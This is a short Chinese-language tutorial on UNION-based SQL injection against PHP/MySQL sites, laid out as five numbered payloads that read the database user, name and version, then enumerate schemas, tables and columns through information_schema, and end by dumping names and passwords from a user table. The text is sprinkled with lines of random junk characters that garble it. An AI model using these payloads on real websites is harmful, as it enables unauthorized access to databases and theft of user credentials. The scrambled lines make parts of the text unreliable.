% b$ \7 F( r7 |* |4 ]0 G
教程内容:Mysql 5+php 注入
* p0 i9 U- j8 s* S7 T% ]2 ~+ |) W) G' `9 `& E1 J# r1 s
; L$ I3 M# i2 P9 Q- p
# |6 V/ ?+ S6 }$ f; r8 p: W! N一.查看MYSQL基本信息(库名,版本,用户)1 s9 E- b7 Z& w _ f$ R- W. b: R1 Z
4 j$ Q7 I+ Y Uand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*2 h; t7 X& D7 ^+ z" w& c
9 D" e0 e$ v6 D/ o; P- a二.查数据库% w8 N1 u# j( @& B. @& {8 v, t$ N
: C L+ C8 u/ b
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*! q+ \3 P6 x. D! J" P
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。 | ^# v, R3 t" Z3 P7 R- t
+ R/ e$ |% n- H# C% Y% g三.暴表% A! V+ f" b/ `" C4 ^6 a
0 w5 ?( H/ q# {3 v: |: K" @
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
& L. u( }& O( p0 a" x/ D
+ Q8 q1 G3 }6 ^; k7 G! N, nlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
2 m: Q2 O4 S* P% z
1 j F2 r$ {+ |1 [1 y四.暴字段; k( W- n$ a1 B6 ^7 [
6 N$ z& U5 h) O5 U3 d
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
3 f( W% V( E/ l8 s
) o: T9 Z9 f/ T: Y! ?" ]% f- blimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
, f1 w8 G* A4 u
( T: Z5 B- Z: S! `5 c五.暴数据) c( U( e/ U" C/ Q5 X+ e
6 Z0 w1 H2 S4 @6 p; b
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*# _8 u9 c" z$ p1 ^- `% l
# ^8 W$ u* O+ K) R% A( @, [) q' b
! B, t0 [1 d# v: G7 d
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。6 H3 h" W) |9 |; B
|